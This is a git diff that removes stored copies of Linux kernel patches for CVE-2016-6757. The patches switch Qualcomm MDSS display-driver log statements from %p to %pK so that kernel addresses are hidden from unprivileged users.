-@@ -611,7 +611,7 @@ static int mdss_dsi_panel_on(struct mdss_panel_data *pdata)
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+ pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
-
- if (pinfo->dcs_cmd_by_left) {
- if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -641,7 +641,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+ pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
-
- pinfo = &pdata->panel_info;
- if (pinfo->dcs_cmd_by_left) {
-@@ -651,7 +651,7 @@ static int mdss_dsi_post_panel_on(struct mdss_panel_data *pdata)
-
- on_cmds = &ctrl->post_panel_on_cmds;
-
-- pr_debug("%s: ctrl=%p cmd_cnt=%d\n", __func__, ctrl, on_cmds->cmd_cnt);
-+ pr_debug("%s: ctrl=%pK cmd_cnt=%d\n", __func__, ctrl, on_cmds->cmd_cnt);
-
- if (on_cmds->cmd_cnt) {
- msleep(50); /* wait for 3 vsync passed */
-@@ -677,7 +677,7 @@ static int mdss_dsi_panel_off(struct mdss_panel_data *pdata)
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d\n", __func__, ctrl, ctrl->ndx);
-+ pr_debug("%s: ctrl=%pK ndx=%d\n", __func__, ctrl, ctrl->ndx);
-
- if (pinfo->dcs_cmd_by_left) {
- if (ctrl->ndx != DSI_CTRL_LEFT)
-@@ -708,7 +708,7 @@ static int mdss_dsi_panel_low_power_config(struct mdss_panel_data *pdata,
- ctrl = container_of(pdata, struct mdss_dsi_ctrl_pdata,
- panel_data);
-
-- pr_debug("%s: ctrl=%p ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
-+ pr_debug("%s: ctrl=%pK ndx=%d enable=%d\n", __func__, ctrl, ctrl->ndx,
- enable);
-
- /* Any panel specific low power commands/config */
-diff --git a/drivers/video/msm/mdss/mdss_fb.c
b/drivers/video/msm/mdss/mdss_fb.c
-index c06abd3..6f09747 100644
----- a/drivers/video/msm/mdss/mdss_fb.c
-+++ b/drivers/video/msm/mdss/mdss_fb.c
-@@ -1642,7 +1642,7 @@ int mdss_fb_alloc_fb_ion_memory(struct msm_fb_data_type *mfd, size_t fb_size)
- goto fb_mmap_failed;
- }
-
-- pr_debug("alloc 0x%zuB vaddr = %p (%pa iova) for fb%d\n", fb_size,
-+ pr_debug("alloc 0x%zuB vaddr = %pK (%pa iova) for fb%d\n", fb_size,
- vaddr, &mfd->iova, mfd->index);
-
- mfd->fbi->screen_base = (char *) vaddr;
-@@ -1735,7 +1735,7 @@ static int mdss_fb_fbmem_ion_mmap(struct fb_info *info,
- vma->vm_page_prot =
- pgprot_writecombine(vma->vm_page_prot);
-
-- pr_debug("vma=%p, addr=%x len=%ld\n",
-+ pr_debug("vma=%pK, addr=%x len=%ld\n",
- vma, (unsigned int)addr, len);
- pr_debug("vm_start=%x vm_end=%x vm_page_prot=%ld\n",
- (unsigned int)vma->vm_start,
-@@ -1905,7 +1905,7 @@ static int mdss_fb_alloc_fbmem_iommu(struct msm_fb_data_type *mfd, int dom)
- if (rc)
- pr_warn("Cannot map fb_mem %pa to IOMMU. rc=%d\n", &phys, rc);
-
-- pr_debug("alloc 0x%zxB @ (%pa phys) (0x%p virt) (%pa iova) for fb%d\n",
-+ pr_debug("alloc 0x%zxB @ (%pa phys) (0x%pK virt) (%pa iova) for fb%d\n",
- size, &phys, virt, &mfd->iova, mfd->index);
-
- mfd->fbi->screen_base = virt;
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_tx.c b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-index 90f9267..140a460 100644
----- a/drivers/video/msm/mdss/mdss_hdmi_tx.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_tx.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2014,2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -1035,7 +1035,7 @@ static int hdmi_tx_sysfs_create(struct hdmi_tx_ctrl *hdmi_ctrl,
- return rc;
- }
- hdmi_ctrl->kobj = &fbi->dev->kobj;
-- DEV_DBG("%s: sysfs group %p\n", __func__, hdmi_ctrl->kobj);
-+ DEV_DBG("%s: sysfs group %pK\n", __func__, hdmi_ctrl->kobj);
-
- return 0;
- } /* hdmi_tx_sysfs_create */
-@@ -3556,7 +3556,7 @@ static int hdmi_tx_init_resource(struct hdmi_tx_ctrl *hdmi_ctrl)
- DEV_DBG("%s: '%s' remap failed or not available\n",
- __func__, hdmi_tx_io_name(i));
- }
-- DEV_INFO("%s: '%s': start = 0x%p, len=0x%x\n", __func__,
-+ DEV_INFO("%s: '%s': start = 0x%pK, len=0x%x\n", __func__,
- hdmi_tx_io_name(i), pdata->io[i].base,
- pdata->io[i].len);
- }
-diff --git a/drivers/video/msm/mdss/mdss_hdmi_util.c b/drivers/video/msm/mdss/mdss_hdmi_util.c
-index b40ff28..b50aee3 100644
----- a/drivers/video/msm/mdss/mdss_hdmi_util.c
-+++ b/drivers/video/msm/mdss/mdss_hdmi_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2010-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2010-2014,2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -178,7 +178,7 @@ static void hdmi_ddc_print_data(struct hdmi_tx_ddc_data *ddc_data,
- return;
- }
-
-- DEV_DBG("%s: buf=%p, d_len=0x%x, d_addr=0x%x, no_align=%d\n",
-+ DEV_DBG("%s: buf=%pK, d_len=0x%x, d_addr=0x%x, no_align=%d\n",
- caller, ddc_data->data_buf, ddc_data->data_len,
- ddc_data->dev_addr, ddc_data->no_align);
- DEV_DBG("%s: offset=0x%x, req_len=0x%x, retry=%d, what=%s\n",
-diff --git a/drivers/video/msm/mdss/mdss_mdp.c b/drivers/video/msm/mdss/mdss_mdp.c
-index 14514f3..3a53359 100644
----- a/drivers/video/msm/mdss/mdss_mdp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp.c
-@@ -1207,7 +1207,7 @@ static u32 mdss_mdp_res_init(struct mdss_data_type *mdata)
-
- mdata->iclient = msm_ion_client_create(mdata->pdev->name);
- if (IS_ERR_OR_NULL(mdata->iclient)) {
-- pr_err("msm_ion_client_create() return error (%p)\n",
-+ pr_err("msm_ion_client_create() return error (%pK)\n",
- mdata->iclient);
- mdata->iclient = NULL;
- }
-@@ -1526,7 +1526,7 @@ static int mdss_mdp_probe(struct platform_device *pdev)
- if (rc)
- pr_debug("unable to map MDSS VBIF non-realtime base\n");
- else
-- pr_debug("MDSS VBIF NRT HW Base addr=%p len=0x%x\n",
-+ pr_debug("MDSS VBIF NRT HW Base addr=%pK len=0x%x\n",
- mdata->vbif_nrt_io.base, mdata->vbif_nrt_io.len);
-
- res = platform_get_resource(pdev, IORESOURCE_IRQ, 0);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_debug.c b/drivers/video/msm/mdss/mdss_mdp_debug.c
-index 39230d1..9b1ab8d 100644
----- a/drivers/video/msm/mdss/mdss_mdp_debug.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_debug.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2014,2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -57,13 +57,13 @@ static void __dump_pipe(struct seq_file *s, struct mdss_mdp_pipe *pipe)
- seq_puts(s, "Data:\n");
- if (pipe->front_buf.num_planes) {
- buf = pipe->front_buf.p;
-- seq_printf(s, "\tfront_buf ihdl=0x%p addr=%pa size=%lu\n",
-+ seq_printf(s, "\tfront_buf ihdl=0x%pK addr=%pa size=%lu\n",
- buf->srcp_ihdl, &buf->addr, buf->len);
- }
-
- if (pipe->back_buf.num_planes) {
- buf = pipe->back_buf.p;
-- seq_printf(s, "\tback_buf ihdl=0x%p addr=%pa size=%lu\n",
-+ seq_printf(s, "\tback_buf ihdl=0x%pK addr=%pa size=%lu\n",
- buf->srcp_ihdl, &buf->addr, buf->len);
- }
- }
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-index 6f6fc91..b07b3c5 100644
----- a/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_cmd.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -581,7 +581,7 @@ static int mdss_mdp_cmd_wait4pingpong(struct mdss_mdp_ctl *ctl, void *arg)
- ctx->rdptr_enabled, ctl->roi_bkup.w,
- ctl->roi_bkup.h);
-
-- pr_debug("%s: intf_num=%d ctx=%p koff_cnt=%d\n", __func__,
-+ pr_debug("%s: intf_num=%d ctx=%pK koff_cnt=%d\n", __func__,
- ctl->intf_num, ctx, atomic_read(&ctx->koff_cnt));
-
- rc = wait_event_timeout(ctx->pp_waitq,
-@@ -1164,7 +1164,7 @@ static int mdss_mdp_cmd_intfs_setup(struct mdss_mdp_ctl *ctl,
-
- ctx->intf_stopped = 0;
-
-- pr_debug("%s: ctx=%p num=%d mixer=%d\n", __func__,
-+ pr_debug("%s: ctx=%pK num=%d mixer=%d\n", __func__,
- ctx, ctx->pp_num, mixer->num);
- MDSS_XLOG(ctl->num, atomic_read(&ctx->koff_cnt), ctx->clk_enabled,
- ctx->rdptr_enabled);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_intf_video.c b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-index 2bc8a1d..9ce6885 100644
----- a/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_intf_video.c
-@@ -116,7 +116,7 @@ int mdss_mdp_video_addr_setup(struct mdss_data_type *mdata,
-
- for (i = 0; i < count; i++) {
- head[i].base = mdata->mdss_io.base + offsets[i];
-- pr_debug("adding Video Intf #%d offset=0x%x virt=%p\n", i,
-+ pr_debug("adding Video Intf #%d offset=0x%x virt=%pK\n", i,
- offsets[i], head[i].base);
- head[i].ref_cnt = 0;
- head[i].intf_num = i + MDSS_MDP_INTF0;
-@@ -442,7 +442,7 @@ static int mdss_mdp_video_intfs_stop(struct mdss_mdp_ctl *ctl,
- pr_err("Intf %d not in use\n", (inum + MDSS_MDP_INTF0));
- return -ENODEV;
- }
-- pr_debug("stop ctl=%d video Intf #%d base=%p", ctl->num,
-+ pr_debug("stop ctl=%d video Intf #%d base=%pK", ctl->num,
- ctx->intf_num, ctx->base);
- } else {
- pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-@@ -1158,7 +1158,7 @@ static int mdss_mdp_video_intfs_setup(struct mdss_mdp_ctl *ctl,
- (inum +
MDSS_MDP_INTF0));
- return -EBUSY;
- }
-- pr_debug("video Intf #%d base=%p", ctx->intf_num, ctx->base);
-+ pr_debug("video Intf #%d base=%pK", ctx->intf_num, ctx->base);
- ctx->ref_cnt++;
- } else {
- pr_err("Invalid intf number: %d\n", (inum + MDSS_MDP_INTF0));
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pipe.c b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-index b747670..d8d01af 100644
----- a/drivers/video/msm/mdss/mdss_mdp_pipe.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pipe.c
-@@ -1739,7 +1739,7 @@ int mdss_mdp_pipe_queue_data(struct mdss_mdp_pipe *pipe,
- }
-
- if (src_data == NULL) {
-- pr_debug("src_data=%p pipe num=%dx\n",
-+ pr_debug("src_data=%pK pipe num=%dx\n",
- src_data, pipe->num);
- goto update_nobuf;
- }
-diff --git a/drivers/video/msm/mdss/mdss_mdp_pp.c b/drivers/video/msm/mdss/mdss_mdp_pp.c
-index 3cfa926..5065bc8 100644
----- a/drivers/video/msm/mdss/mdss_mdp_pp.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_pp.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -2224,7 +2224,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
- pr_debug("AD not supported on device.\n");
- return ret;
- } else if (ret || !ad) {
-- pr_err("Failed to get ad info: ret = %d, ad = 0x%p.\n",
-+ pr_err("Failed to get ad info: ret = %d, ad = 0x%pK.\n",
- ret, ad);
- return ret;
- }
-@@ -2240,7 +2240,7 @@ static int pp_ad_calc_bl(struct msm_fb_data_type *mfd, int bl_in, int *bl_out,
-
- if (!ad->bl_mfd || !ad->bl_mfd->panel_info ||
- !ad->bl_att_lut) {
-- pr_err("Invalid ad info: bl_mfd = 0x%p, ad->bl_mfd->panel_info = 0x%p, bl_att_lut = 0x%p\n",
-+ pr_err("Invalid ad info: bl_mfd = 0x%pK, ad->bl_mfd->panel_info = 0x%pK, bl_att_lut = 0x%pK\n",
- ad->bl_mfd,
- (!ad->bl_mfd) ?
NULL : ad->bl_mfd->panel_info,
- ad->bl_att_lut);
-@@ -3507,7 +3507,7 @@ static int pp_hist_enable(struct pp_hist_col_info *hist_info,
- spin_lock_irqsave(&hist_info->hist_lock, flag);
- if (hist_info->col_en) {
- spin_unlock_irqrestore(&hist_info->hist_lock, flag);
-- pr_info("%s Hist collection has already been enabled %p\n",
-+ pr_info("%s Hist collection has already been enabled %pK\n",
- __func__, hist_info->base);
- goto exit;
- }
-@@ -3644,7 +3644,7 @@ static int pp_hist_disable(struct pp_hist_col_info *hist_info)
- spin_lock_irqsave(&hist_info->hist_lock, flag);
- if (hist_info->col_en == false) {
- spin_unlock_irqrestore(&hist_info->hist_lock, flag);
-- pr_debug("Histogram already disabled (%p)\n", hist_info->base);
-+ pr_debug("Histogram already disabled (%pK)\n", hist_info->base);
- ret = -EINVAL;
- goto exit;
- }
-@@ -3758,7 +3758,7 @@ int mdss_mdp_hist_intr_req(struct mdss_intr *intr, u32 bits, bool en)
- unsigned long flag;
- int ret = 0;
- if (!intr) {
-- pr_err("NULL addr passed, %p\n", intr);
-+ pr_err("NULL addr passed, %pK\n", intr);
- return -EINVAL;
- }
-
-@@ -4512,7 +4512,7 @@ static int pp_ad_invalidate_input(struct msm_fb_data_type *mfd)
-
- ret = mdss_mdp_get_ad(mfd, &ad);
- if (ret || !ad) {
-- pr_err("Fail to get ad: ret = %d, ad = 0x%p\n", ret, ad);
-+ pr_err("Fail to get ad: ret = %d, ad = 0x%pK\n", ret, ad);
- return -EINVAL;
- }
- pr_debug("AD backlight level changed (%d), trigger update to AD\n",
-diff --git a/drivers/video/msm/mdss/mdss_mdp_util.c b/drivers/video/msm/mdss/mdss_mdp_util.c
-index c62acf3..926dfde 100644
---- a/drivers/video/msm/mdss/mdss_mdp_util.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_util.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -507,7 +507,7 @@ static int mdss_mdp_put_img(struct mdss_mdp_img_data *data)
- pr_debug("pmem buf=0x%pa\n", &data->addr);
- data->srcp_file = NULL;
- } else if (!IS_ERR_OR_NULL(data->srcp_ihdl)) {
-- pr_debug("ion hdl=%p buf=0x%pa\n", data->srcp_ihdl,
-+ pr_debug("ion hdl=%pK buf=0x%pa\n", data->srcp_ihdl,
- &data->addr);
- if (!iclient) {
- pr_err("invalid ion client\n");
-@@ -599,7 +599,7 @@ static int mdss_mdp_get_img(struct msmfb_data *img,
- data->addr += data->offset;
- data->len -= data->offset;
-
-- pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lu\n", img->memory_id,
-+ pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lu\n", img->memory_id,
- data->srcp_ihdl, &data->addr, data->len);
- } else {
- mdss_mdp_put_img(data);
-@@ -653,7 +653,7 @@ static int mdss_mdp_map_buffer(struct mdss_mdp_img_data *data)
- data->addr += data->offset;
- data->len -= data->offset;
-
-- pr_debug("ihdl=%p buf=0x%pa len=0x%lu\n",
-+ pr_debug("ihdl=%pK buf=0x%pa len=0x%lu\n",
- data->srcp_ihdl, &data->addr, data->len);
- } else {
- mdss_mdp_put_img(data);
-diff --git a/drivers/video/msm/mdss/mdss_mdp_wb.c b/drivers/video/msm/mdss/mdss_mdp_wb.c
-index def90eb..da6587e 100644
---- a/drivers/video/msm/mdss/mdss_mdp_wb.c
-+++ b/drivers/video/msm/mdss/mdss_mdp_wb.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -95,7 +95,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- ihdl = ion_alloc(iclient, img_size, SZ_4K,
- ION_HEAP(ION_SF_HEAP_ID), 0);
- if (IS_ERR_OR_NULL(ihdl)) {
-- pr_err("unable to alloc fbmem from ion (%p)\n", ihdl);
-+ pr_err("unable to alloc fbmem from ion (%pK)\n", ihdl);
- return NULL;
- }
-
-@@ -122,7 +122,7 @@ struct mdss_mdp_data *mdss_mdp_wb_debug_buffer(struct msm_fb_data_type *mfd)
- img->len = img_size;
- }
-
-- pr_debug("ihdl=%p virt=%p phys=0x%pa iova=0x%pa size=%u\n",
-+ pr_debug("ihdl=%pK virt=%pK phys=0x%pa iova=0x%pa size=%u\n",
- ihdl, videomemory, &mdss_wb_mem, &img->addr, img_size);
- }
- return &mdss_wb_buffer;
-@@ -435,7 +435,7 @@ static struct mdss_mdp_wb_data *get_user_node(struct msm_fb_data_type *mfd,
- list_for_each_entry(node, &wb->register_queue, registered_entry)
- if ((node->buf_data.p[0].srcp_ihdl == ihdl) &&
- (node->buf_info.offset == data->offset)) {
-- pr_debug("found fd=%d hdl=%p off=%x addr=%pa\n",
-+ pr_debug("found fd=%d hdl=%pK off=%x addr=%pa\n",
- data->memory_id, ihdl,
- data->offset,
- &node->buf_data.p[0].addr);
-@@ -501,7 +501,7 @@ static void mdss_mdp_wb_free_node(struct mdss_mdp_wb_data *node)
- if (node->user_alloc) {
- buf = &node->buf_data.p[0];
-
-- pr_debug("free user mem_id=%d ihdl=%p, offset=%u addr=0x%pa\n",
-+ pr_debug("free user mem_id=%d ihdl=%pK, offset=%u addr=0x%pa\n",
- node->buf_info.memory_id,
- buf->srcp_ihdl,
- node->buf_info.offset,
-diff --git a/drivers/video/msm/mdss/mdss_util.c b/drivers/video/msm/mdss/mdss_util.c
-index 587db41..345b0927 100644
---- a/drivers/video/msm/mdss/mdss_util.c
-+++ b/drivers/video/msm/mdss/mdss_util.c
-@@ -1,5 +1,4 @@
--
--/* Copyright (c) 2007-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2007-2014,2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -33,7 +32,7 @@ int mdss_register_irq(struct mdss_hw *hw)
- if (!mdss_irq_handlers[hw->hw_ndx])
- mdss_irq_handlers[hw->hw_ndx] = hw;
- else
-- pr_err("panel %d's irq at %p is already registered\n",
-+ pr_err("panel %d's irq at %pK is already registered\n",
- hw->hw_ndx, hw->irq_handler);
- spin_unlock_irqrestore(&mdss_lock, irq_flags);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch
deleted file mode 100644
index 8edc43e5..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6757/3.18/0002.patch
+++ /dev/null
@@ -1,2368 +0,0 @@
-From f2ba68242d79016cc07b59aa41a67b7a1d36bf9b Mon Sep 17 00:00:00 2001
-From: Abhijit Kulkarni
-Date: Mon, 12 Sep 2016 12:41:53 -0700
-Subject: msm: mdss: hide kernel addresses from unprevileged users
-
-for printing kernel pointers which should be hidden from unprivileged
-users, use %pK which evaluates whether kptr_restrict is set.
-
-CRs-Fixed: 987021
-Change-Id: Ie49eee9478f4657cfb2a994ba60da1ec4c356339
-Signed-off-by: Abhijit Kulkarni
----
- drivers/video/msm/mdss/mdp3.c | 16 ++---
- drivers/video/msm/mdss/mdp3_ppp_hwio.c | 6 +-
- drivers/video/msm/mdss/mdss_compat_utils.c | 18 ++---
- drivers/video/msm/mdss/mdss_debug.c | 4 +-
- drivers/video/msm/mdss/mdss_debug_xlog.c | 14 ++--
- drivers/video/msm/mdss/mdss_dsi.c | 28 ++++----
- drivers/video/msm/mdss/mdss_dsi_clk.c | 6 +-
- drivers/video/msm/mdss/mdss_dsi_host.c | 2 +-
- drivers/video/msm/mdss/mdss_dsi_panel.c | 10 +--
- drivers/video/msm/mdss/mdss_fb.c | 12 ++--
- drivers/video/msm/mdss/mdss_hdmi_tx.c | 6 +-
- drivers/video/msm/mdss/mdss_mdp.c | 12 ++--
- drivers/video/msm/mdss/mdss_mdp_intf_cmd.c | 6 +-
- drivers/video/msm/mdss/mdss_mdp_intf_video.c | 10 +--
- drivers/video/msm/mdss/mdss_mdp_layer.c | 4 +-
- drivers/video/msm/mdss/mdss_mdp_overlay.c | 10 +--
- drivers/video/msm/mdss/mdss_mdp_pipe.c | 4 +-
- drivers/video/msm/mdss/mdss_mdp_pp.c | 70 +++++++++----------
- drivers/video/msm/mdss/mdss_mdp_pp_cache_config.c | 66 +++++++++---------
- drivers/video/msm/mdss/mdss_mdp_pp_v1_7.c | 82 +++++++++++------------
- drivers/video/msm/mdss/mdss_mdp_rotator.c | 6 +-
- drivers/video/msm/mdss/mdss_mdp_util.c | 9 +--
- drivers/video/msm/mdss/mdss_mdp_wb.c | 10 +--
- drivers/video/msm/mdss/mdss_util.c | 2 +-
- drivers/video/msm/mdss/mhl3/mhl_linux_tx.c | 4 +-
- drivers/video/msm/mdss/mhl3/mhl_supp.c | 14 ++--
- drivers/video/msm/mdss/mhl3/platform.c | 8 +--
- drivers/video/msm/mdss/mhl3/si_8620_drv.c | 4 +-
- drivers/video/msm/mdss/mhl3/si_emsc_hid.c | 8 +--
-
drivers/video/msm/mdss/mhl3/si_mdt_inputdev.c | 27 ++++----
- drivers/video/msm/mdss/mhl3/si_mhl2_edid_3d.c | 27 ++++----
- 31 files changed, 253 insertions(+), 252 deletions(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3.c b/drivers/video/msm/mdss/mdp3.c
-index 88e34c3..b5deef6 100644
---- a/drivers/video/msm/mdss/mdp3.c
-+++ b/drivers/video/msm/mdss/mdp3.c
-@@ -1135,7 +1135,7 @@ static int mdp3_res_init(void)
-
- mdp3_res->ion_client = msm_ion_client_create(mdp3_res->pdev->name);
- if (IS_ERR_OR_NULL(mdp3_res->ion_client)) {
-- pr_err("msm_ion_client_create() return error (%p)\n",
-+ pr_err("msm_ion_client_create() return error (%pK)\n",
- mdp3_res->ion_client);
- mdp3_res->ion_client = NULL;
- return -EINVAL;
-@@ -1565,7 +1565,7 @@ void mdp3_unmap_iommu(struct ion_client *client, struct ion_handle *handle)
- mutex_lock(&mdp3_res->iommu_lock);
- meta = mdp3_iommu_meta_lookup(table);
- if (!meta) {
-- WARN(1, "%s: buffer was never mapped for %p\n", __func__,
-+ WARN(1, "%s: buffer was never mapped for %pK\n", __func__,
- handle);
- mutex_unlock(&mdp3_res->iommu_lock);
- return;
-@@ -1591,7 +1591,7 @@ static void mdp3_iommu_meta_add(struct mdp3_iommu_meta *meta)
- } else if (meta->table > entry->table) {
- p = &(*p)->rb_right;
- } else {
-- pr_err("%s: handle %p already exists\n", __func__,
-+ pr_err("%s: handle %pK already exists\n", __func__,
- entry->handle);
- BUG();
- }
-@@ -1654,7 +1654,7 @@ static int mdp3_iommu_map_iommu(struct mdp3_iommu_meta *meta,
- ret = iommu_map_range(domain, meta->iova_addr + padding,
- table->sgl, size, prot);
- if (ret) {
-- pr_err("%s: could not map %pa in domain %p\n",
-+ pr_err("%s: could not map %pa in domain %pK\n",
- __func__, &meta->iova_addr, domain);
- unmap_size = padding;
- goto out2;
-@@ -1777,12 +1777,12 @@ int mdp3_self_map_iommu(struct ion_client *client, struct ion_handle *handle,
- }
- } else {
- if (iommu_meta->flags != iommu_flags) {
-- pr_err("%s: hndl %p already mapped with diff flag\n",
-+ pr_err("%s: hndl %pK
already mapped with diff flag\n",
- __func__, handle);
- ret = -EINVAL;
- goto out_unlock;
- } else if (iommu_meta->mapped_size != iova_length) {
-- pr_err("%s: hndl %p already mapped with diff len\n",
-+ pr_err("%s: hndl %pK already mapped with diff len\n",
- __func__, handle);
- ret = -EINVAL;
- goto out_unlock;
-@@ -1816,7 +1816,7 @@ int mdp3_put_img(struct mdp3_img_data *data, int client)
- fdput(data->srcp_f);
- memset(&data->srcp_f, 0, sizeof(struct fd));
- } else if (!IS_ERR_OR_NULL(data->srcp_dma_buf)) {
-- pr_debug("ion hdl = %p buf=0x%pa\n", data->srcp_dma_buf,
-+ pr_debug("ion hdl = %pK buf=0x%pa\n", data->srcp_dma_buf,
- &data->addr);
- if (!iclient) {
- pr_err("invalid ion client\n");
-@@ -1919,7 +1919,7 @@ done:
- data->addr += img->offset;
- data->len -= img->offset;
-
-- pr_debug("mem=%d ihdl=%p buf=0x%pa len=0x%lx\n",
-+ pr_debug("mem=%d ihdl=%pK buf=0x%pa len=0x%lx\n",
- img->memory_id, data->srcp_dma_buf,
- &data->addr, data->len);
-
-diff --git a/drivers/video/msm/mdss/mdp3_ppp_hwio.c b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-index e14abd0..907063c 100644
---- a/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-+++ b/drivers/video/msm/mdss/mdp3_ppp_hwio.c
-@@ -1308,7 +1308,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- pr_debug("ROI(x %d,y %d,w %d, h %d) ",
- blit_op->src.roi.x, blit_op->src.roi.y,
- blit_op->src.roi.width, blit_op->src.roi.height);
-- pr_debug("Addr_P0 %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ pr_debug("Addr_P0 %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- blit_op->src.p0, blit_op->src.stride0,
- blit_op->src.p1, blit_op->src.stride1);
-
-@@ -1320,7 +1320,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- pr_debug("ROI(x %d,y %d, w %d, h %d) ",
- blit_op->bg.roi.x, blit_op->bg.roi.y,
- blit_op->bg.roi.width, blit_op->bg.roi.height);
-- pr_debug("Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ pr_debug("Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- blit_op->bg.p0, blit_op->bg.stride0,
-
blit_op->bg.p1, blit_op->bg.stride1);
- }
-@@ -1331,7 +1331,7 @@ int config_ppp_op_mode(struct ppp_blit_op *blit_op)
- pr_debug("ROI(x %d,y %d, w %d, h %d) ",
- blit_op->dst.roi.x, blit_op->dst.roi.y,
- blit_op->dst.roi.width, blit_op->dst.roi.height);
-- pr_debug("Addr %p, Stride S0 %d Addr_P1 %p, Stride S1 %d\n",
-+ pr_debug("Addr %pK, Stride S0 %d Addr_P1 %pK, Stride S1 %d\n",
- blit_op->dst.p0, blit_op->dst.stride0,
- blit_op->dst.p1, blit_op->dst.stride1);
-
-diff --git a/drivers/video/msm/mdss/mdss_compat_utils.c b/drivers/video/msm/mdss/mdss_compat_utils.c
-index e883f04..5ad51dd 100644
---- a/drivers/video/msm/mdss/mdss_compat_utils.c
-+++ b/drivers/video/msm/mdss/mdss_compat_utils.c
-@@ -150,7 +150,7 @@ static struct mdp_input_layer32 *__create_layer_list32(
- compat_ptr(commit32->commit_v1.input_layers),
- sizeof(struct mdp_input_layer32) * layer_count);
- if (ret) {
-- pr_err("layer list32 copy from user failed, ptr %p\n",
-+ pr_err("layer list32 copy from user failed, ptr %pK\n",
- compat_ptr(commit32->commit_v1.input_layers));
- kfree(layer_list32);
- ret = -EFAULT;
-@@ -182,7 +182,7 @@ static int __copy_scale_params(struct mdp_input_layer *layer,
- sizeof(struct mdp_scale_data));
- if (ret) {
- kfree(scale);
-- pr_err("scale param copy from user failed, ptr %p\n",
-+ pr_err("scale param copy from user failed, ptr %pK\n",
- compat_ptr(layer32->scale));
- ret = -EFAULT;
- } else {
